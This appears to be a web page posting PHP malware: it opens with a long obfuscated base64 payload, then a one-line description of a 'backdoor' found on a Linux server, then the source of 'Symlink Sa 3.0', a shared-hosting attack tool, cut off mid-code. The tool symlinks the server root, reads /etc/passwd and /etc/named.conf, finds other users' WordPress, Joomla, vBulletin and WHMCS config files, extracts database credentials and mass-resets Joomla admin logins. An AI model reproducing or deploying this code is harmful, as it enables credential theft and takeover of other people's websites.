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")))); ?>

A variant of backdoor Script

Here is a variant of Backdoor script, I found on a Linux Server. This script can be used to upload new files or edit existing ones.

<?php


/*

  .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
  88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
  `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
    `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
  db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
  `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP


   author..............: s3n4t00r
   home................: sec-w.com
   twitter.............: @s3n4t00r
   name tools..........: Symlink Sa v3.0

*/



set_time_limit(0);
error_reporting(0);


$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>

<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{

 font-size: 13px;

}


body {
    direction: ltr;
    background-color:#F4F4F4;
    color: rgb(153, 153, 153);
    text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
  color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);



@symlink("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{





/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){

@preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);

@symlink("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}



break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}



echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                  if($w){

                  echo '<br />save has been successfully';

                  }

fclose($f);




}



break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

     $u=explode(':', $f);
     $user = $u['0'];



echo "
<tr>



<td width='15%'>
$user
</td>






<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}






die ("</tr></div>");


                  }





}



echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }

                                        }

 }


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}









die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}


break;

case 'wp':

############################ index #########################3






########  admin ##########33

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

